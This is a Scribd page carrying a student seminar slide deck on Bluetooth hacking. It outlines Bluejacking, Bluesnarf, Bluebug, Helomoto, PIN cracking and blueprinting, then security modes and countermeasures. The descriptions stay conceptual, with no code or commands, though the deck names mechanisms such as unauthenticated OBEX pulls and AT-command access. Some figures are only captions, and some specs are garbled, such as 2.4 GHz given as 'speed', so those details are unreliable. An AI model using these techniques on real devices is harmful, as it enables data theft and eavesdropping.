Scribd Logo
Upload

Welcome to Scribd!

  • 357 views

    Bluetooth Hacking

    Uploaded by

    asher
    The document summarizes security threats related to Bluetooth hacking. It describes common Bluetooth attacks like Bluejacking, Bluesnarfing and Bluebugging which allow stealing data or taking control of Bluetooth devices. It also outlines Bluetooth technology basics, security levels, and recommends countermeasures like disabling Bluetooth when not in use and avoiding accepting files from unknown sources.

    Copyright:

    © All Rights Reserved
    Download as PPT, PDF, TXT or read online from Scribd

    Bluetooth Hacking

    Uploaded by

    asher
    357 views20 pages
    The document summarizes security threats related to Bluetooth hacking. It describes common Bluetooth attacks like Bluejacking, Bluesnarfing and Bluebugging which allow stealing data or taking control of Bluetooth devices. It also outlines Bluetooth technology basics, security levels, and recommends countermeasures like disabling Bluetooth when not in use and avoiding accepting files from unknown sources.

    Original Title

    bluetooth hacking

    Copyright

    © © All Rights Reserved

    Available Formats

    PPT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    The document summarizes security threats related to Bluetooth hacking. It describes common Bluetooth attacks like Bluejacking, Bluesnarfing and Bluebugging which allow stealing data or taking control of Bluetooth devices. It also outlines Bluetooth technology basics, security levels, and recommends countermeasures like disabling Bluetooth when not in use and avoiding accepting files from unknown sources.

    Copyright:

    © All Rights Reserved
    Download as PPT, PDF, TXT or read online from Scribd
    Download as ppt, pdf, or txt
    357 views20 pages

    Bluetooth Hacking

    Uploaded by

    asher
    The document summarizes security threats related to Bluetooth hacking. It describes common Bluetooth attacks like Bluejacking, Bluesnarfing and Bluebugging which allow stealing data or taking control of Bluetooth devices. It also outlines Bluetooth technology basics, security levels, and recommends countermeasures like disabling Bluetooth when not in use and avoiding accepting files from unknown sources.

    Copyright:

    © All Rights Reserved
    Download as PPT, PDF, TXT or read online from Scribd
    Download as ppt, pdf, or txt
    You are on page 1of 20

    Seminar on

    Bluetooth Hacking
    [security and threats]

    By-
    Dhanashree Waikar
    Roll No – 3379

    Project Guide – Prof. N. R. Talhar


    Overview
    • Introduction
    • Bluejack attack
    • Bluespamming
    • The Bluesnarf attack
    • The Bluebug attack
    • Helomoto
    • Crack pin code
    • Blueprinting
    • Other attacks [Trojans, Viruses, worms]
    • Security levels
    • Countermeasures
    September 8, 2020 2
    Bluetooth introduction
    • Wireless networking technology
    • For short range devices
    • Speed-2.4Ghz
    • Range is between 10 to 30m
    • Data transfer rate is 1mbps
    • Bluetooth SIG
    • Founded in 1998
    • Trade association
    • Owns and licenses IP

    September 8, 2020 3
    Bluejack
    • OBEX push attack
    • Object exchange protocol for exchanging
    data with one another (data like files,
    picture, business cards, calendar entries
    etc.)
    • Commonly send ‘business card’ with
    message via OBEX
    • Variants
    • Bluetoothing
    • Bluechatting
    • Modifying a remote mobile phone’s
    address book
    • Bluespamming
    September 8, 2020 4
    BlueSnarf Attack
    • Discovered by Marcel Holtmann
    • Published in October 2003
    • BlueSnarf exploits weak OBEX
    implementation on mobile phones
    • OBEX pull attack
    • Attacker involves the use of the
    OBEX protocol to forcibly pull
    sensitive data out of the victim’s
    mobile phone
    • Extreme vulnerableand damage
    possible through bluesnarfing
    September 8, 2020 5
    BlueSnarf Attack continued…
    • Can steal sensitive data without the
    knowledge of the victim
    • Address book, Photographs,
    • Music, videos, calendar,
    • IMEI, noReading/decoding sms
    messages etc.
    • Adv connects to OBEX push profile
    • No authentication, no pairing needed
    -> invisible connection

    September 8, 2020 6
    Bluebug
    • Discovered by Martin Herfurt
    • Public field test - CeBIT 2004
    • Full access to AT command set hence
    Full phone control
    • Based on AT Commands -> not OBEX
    • Typical use cases : -
    • Call control (turning phone into bug)
    • Initiating a new call to predefined no.

    September 8, 2020 7
    Helomoto
    • Bluesnarf + Bluebug

    • Requires entry in 'Device History'

    • OBEX PUSH to create entry

    • Connect RFCOMM to Hands free or


    Headset
    • No Authentication required
    • Full AT command set access

    September 8, 2020 8
    Pairing
    • When two devices first meet, they
    “pair”
    • Slave must have knowledge of
    BD_ADDR through inquiry or user
    input
    • Pairing information recorded, may
    contain authentication credentials
    • Inquiry mode no longer necessary since
    BD_ADDR is recorded on slave

    September 8, 2020 9
    Creation of k_init

    Creation of k_init
    September 8, 2020 10
    Creation of k_ab

    September 8, 2020 Creation of k_ab 11


    Mutual authentication

    Mutual authentication

    September 8, 2020 12
    The Basic Attack

    List of messages sent during pairing and


    September 8, 2020 authentication process 13
    The Basic Attack Structure

    The Basic Attack Structure


    September 8, 2020 14
    Blueprinting
    • Used for generating statistics about
    manufacturers and models
    • Bluetooth device address->format-
    >MM:MM:MM:XX:XX:XX
    • Whether there are devices in range that have
    issues with Bluetooth security
    • Used to get knowledge of different models
    that can be affected
    • Use service discovery protocol (SDP)
    • Attacker sends problem  Bluetooth device
     Bluetooth device sends back hash
    attacker
    September 8, 2020 15
    Virus Worms and Trojans
    • Viruses do not have the capability to spread and
    infect devices on their own.

    • Even worms are malicious files that cause harm


    to the target device.

    • Trojans are malicious files that can be used for


    carrying out harmful activities on the target
    device.

    September 8, 2020 16
    Security
    • A device can implement three different security
    modes:
    • Nonsecure: A device will not initiate any
    security measures, so communication takes
    place without authentication or encryption.
    • Service-level enforced security: Two devices
    can establish an ACL link in a nonsecure
    manner. Security procedures are initiated
    when a L2CAP (Logical Link Control and
    Adaptation Protocol) channel request is
    made.
    • Link-level enforced security: Security
    procedures are initiated when the ACL link
    is being established.
    September 8, 2020 17
    Countermeasures
    • One should not enable Bluetooth unless
    it is necessary.
    • One should not accept files or business
    cards or any other incoming Bluetooth
    data from unknown people.
    • Avoid using short pairing codes.
    • Change the default name

    September 8, 2020 18
    Any Questions?

    September 8, 2020 19
    Thank you

    September 8, 2020 20

    You might also like